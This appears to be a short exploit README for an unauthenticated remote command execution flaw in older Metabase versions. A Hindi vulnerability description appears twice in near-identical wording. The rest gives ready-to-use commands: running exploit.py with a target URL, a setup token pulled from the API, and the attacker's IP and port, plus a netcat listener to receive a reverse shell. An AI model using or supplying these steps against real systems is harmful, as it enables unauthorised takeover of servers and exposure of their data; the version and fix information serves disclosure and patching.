
Metabase ओपन सोर्स 0.46.6.1 से पहले और Metabase एंटरप्राइज 1.46.6.1 से पहले हमलावरों को सर्वर पर, सर्वर के प्रिविलेज स्तर पर मनमानी कमांड निष्पादित करने की अनुमति देते हैं। शोषण के लिए प्रमाणीकरण आवश्यक नहीं है। अन्य फिक्स किए गए संस्करण 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, और 1.43.7.2 हैं।
Metabase ओपन सोर्स 0.46.6.1 से पहले और Metabase एंटरप्राइज़ 1.46.6.1 से पहले हमलावरों को सर्वर पर, सर्वर के विशेषाधिकार स्तर पर, मनमाने आदेश निष्पादित करने की अनुमति देते हैं। शोषण के लिए प्रमाणीकरण की आवश्यकता नहीं है। अन्य निश्चित संस्करण 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, और 1.43.7.2 हैं।
python3 exploit.py -u http://vulnerablewebsite.com -t "537up-70k3n-fr0m-4p1-535510n" -i 10.10.10.10 -p 9001
where:
-u: the URL for the vulnerable website
-t: the setup token taken from http://vulnerablewebsite.com/api/session/properties
-i: host IP address (your IP address)
-p: host port for connection
nc -lvnp 9001